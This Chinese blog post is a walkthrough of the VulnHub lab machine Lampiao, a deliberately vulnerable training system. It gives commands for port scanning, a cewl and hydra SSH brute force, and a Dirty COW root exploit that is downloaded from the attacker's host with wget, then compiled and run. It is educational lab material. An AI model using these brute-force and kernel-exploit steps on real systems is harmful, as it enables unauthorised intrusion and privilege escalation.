[VulnHub靶机]Lampiao_脏牛提权

已于 2022-03-17 16:57:47 修改
阅读量3.4k 收藏 4
点赞数 3
分类专栏: linux提权 VulnHub靶机渗透测试 文章标签: linux提权 安全
于 2022-03-16 11:02:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/123503705
版权

文章目录

环境介绍

攻击机:kali(192.168.56.104)
受害机:lampiao(192.168.56.107)

实验步骤

1. 扫描端口

nmap -sS -Pn -A -p- -n 192.168.56.107

开放了22、80、1898端口
在这里插入图片描述
在这里插入图片描述

2. 信息收集

80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录:

在这里插入图片描述
在这里插入图片描述
这些文件等会再看,1898端口:

在这里插入图片描述

经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通.

查看博客的详情页面:
下图是第一篇:

在这里插入图片描述
第二篇:
在这里插入图片描述

中间少了一个?q=node/2

在这里插入图片描述

发现了一张图片和一段音频:
在这里插入图片描述
扫描图片没什么有用的信息

音频的内容是:user tigao

3. ssh爆破

这里要用到一个kali下的工具:cewl
添加目标的一些基本信息,用于生成密码字典

cewl http://192.168.56.107:1898/?q=node/1 -w dict.txt

指定用户名tigao,进行hydra爆破:

hydra -l tiago -P dict.txt -vV -t4 192.168.56.107 ssh

在这里插入图片描述

密码:Virgulino

ssh连接:

在这里插入图片描述

4. drupal 7 漏洞getshell

在这里插入图片描述

百度可以搜到cve编号
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

5. 脏牛提权

第二天的时候靶机无法启动了,搞了搞

靶机:192.168.137.134
kali:192.168.137.128

Dirty COW,CVE-2016-5195,攻击者可利用该漏洞本地以低权限提升到root权限。Dirty COW 是一个特权升级漏洞,可以在每个Linux发行版中找到。这个漏洞的特别之处在于,防病毒和安全软件无法检测,一旦被利用,根本无从知晓。

漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权
如果内核版本低于列表里的版本,表示还存在脏牛漏洞
Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

在这里插入图片描述

查看文件具体所在路径:

locate linux/local/40847.cpp

在这里插入图片描述

开启http服务,通过wget下载我们kali下的40847.cpp

python -m SimpleHTTPServer 8000
wget http://192.168.137.128:8000/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
ls -al
./40847

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最终得到

root的密码为dirtyCowFun

拿到root权限
在这里插入图片描述

Stray.io
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub lampiao靶机 Linux脏牛提权
weixin_51441054的博客
04-04 3275
首先我们打开靶机,发现需要登录 利用kali作为攻击机,先扫描其ip地址,kali ip为192.168.142.134,因为在同一局域网下,用nmap扫描 得到靶机ip为192.168.142.136,访问80端口 再进一步扫描端口 得到一个1898端口,貌似是主页 发现cms信息 利用msf进行漏洞利用 攻击成功,得到一个普通用户权限 上传一个探测Linux提权漏洞的探针 发现没有Perl,不能运行,换一个探针...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机Lampiao脏牛提权
m0_52754338的博客
10-02 1546
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
Linux提权--内核漏洞--web用户提权(脏牛)&本地提权(脏管道)
最新发布
金灰的博客
05-11 560
免责声明:本文仅做技术交流与学习...
lampiao靶场---脏牛提权
m0_66908617的博客
05-11 421
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现。
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2315
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
vulnhubLampiao渗透实战(脏牛提权
qq_45300786的博客
04-18 808
总结 1、该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2、在没有思路的时候,try yourself !往往有不同的收获 3、再练练脏牛提权。。。 Lampiao靶机百度云下载 链接:https://pan.baidu.com/s/1_TDcubSNj7z5JweaTxjgKQ 提取码:g3fn 靶机:192.168.100.129 kali:192.168.100.23 其他的我就不说了。详细过程请看Lampiao渗透实战 这里我就说一下,需要特别注意的地方。 这里我是把没有
Vulnhublampiao渗透测试
Bird&Bird
04-02 718
目录1、靶场概述2、信息收集1、靶场概述DescriptionBack to the TopWould you like to keep hacking in your own lab?Try this brand new vulnerable machine! "Lampião 1".Get root!Level: Easy链接:[靶场下载地址](https://www.vulnhub.com/entry/lampiao-1,249/)Kali IP 地址: 192.168.29.131靶场IP地址: 1
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub-靶机Lampiao
qq_43335965的博客
06-13 22
目标信息:攻击机IP地址:192.1681.10 Lampiao靶机IP地址:192.168.1.12 DC-1靶机IP地址:192.168.1.7 目的:获取靶机root权限和靶机设置的所有flag。 知识点:nmap robots.txt drupal7 cms远程代码执行漏洞(CVE-2018-7600) shell交互 脏牛提权 Python创建简单的HTTP服务 Lampiao 在18...
vulnhub靶机-Lampiao
臭nana的博客
12-18 368
搭好环境之后,找到靶机的ip,我这里是10.22.102.174,nmap扫描端口,nmap -p- 10.22.102.174 发现80端口,访问一下 再访问一下1898端口,利用谷歌插件wappalyzer发现这个网站是Drupal7 cms 直接上网百度相关漏洞,发现一大堆,其中发现一个CVE-2018-7600 进入kali,打开终端,输入msfconsole,进...
VulnHub-Lampiao-学习记录
m0_51313985的博客
11-06 173
又是一个周末,很长时间没更新了,摸下靶机记录一下 1.信息收集 开启nmap扫描一下获取目标IP 接着扫目标IP 发现开启了三个端口22,80,1898 尝试对22端口进行ssh弱口令爆破无果,再访问80端口看看 一个静态页面,通过各种工具扫描之后也是没有头绪,还剩一个1898端口 除了一个登录框还要俩页面 天真的我对登录框尝试了弱口令,无果之后陷入了僵局,直到发现url栏里这俩页面一个node/1,一个node/3说明应该还存在一个2,修改成2访问看看 看到了点有用的信息,逐个访问看看 额
2-VulnHub-Lampiao
尼德霍格007
07-07 153
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-7 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 可以看到目标机开放了以下几个端口 尝试ssh弱口令爆破,然鹅并没有获得有用的信息 试着访问一下80端口 好图!!! 搜索一通下来,并没有发现有用的东西 试试1898端口,是Apache的http服务,主页面 第一
lampiao脏牛漏洞提权
vilice的博客
10-13 829
Linux提权练习
Vulnhub靶机 Lampiao
菜浪马废的博客
04-28 544
找到登录页面 cms:drupal7 可以爆破用户名 先找一下漏洞试试 伐克 尝试了半天 发现版本是7.54 用了半天7.0-7.31的 找到mysql的账号 三个账号 没能解密任何一个 试一下ssh 失败了 root就在你眼前 就是没法提权的感觉 太酸爽了 有一个用户tiago ssh爆破 我*********他 密码是这个?????? 我********* $...
Vulnhub靶场篇:Lampiao 夜车星繁的博客
夜车星繁的博客
03-30 1156
许久没有执笔写博客,而今大脑劳累了两个月后,仿佛再次打破从前自己的思想空间,很久之前曾拥有的某些关于人生规划的想法现在我已经看得到它的模糊影子,这标志着我现在有一个真实存在的远方去跋涉。 昨天注册了hackthebox后一筹莫展,最终选择下载网盘上的靶机资源来试炼。 攻击机:kali 开启Vulnix后首先看到的登录页面: 在kali攻击机里确定...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值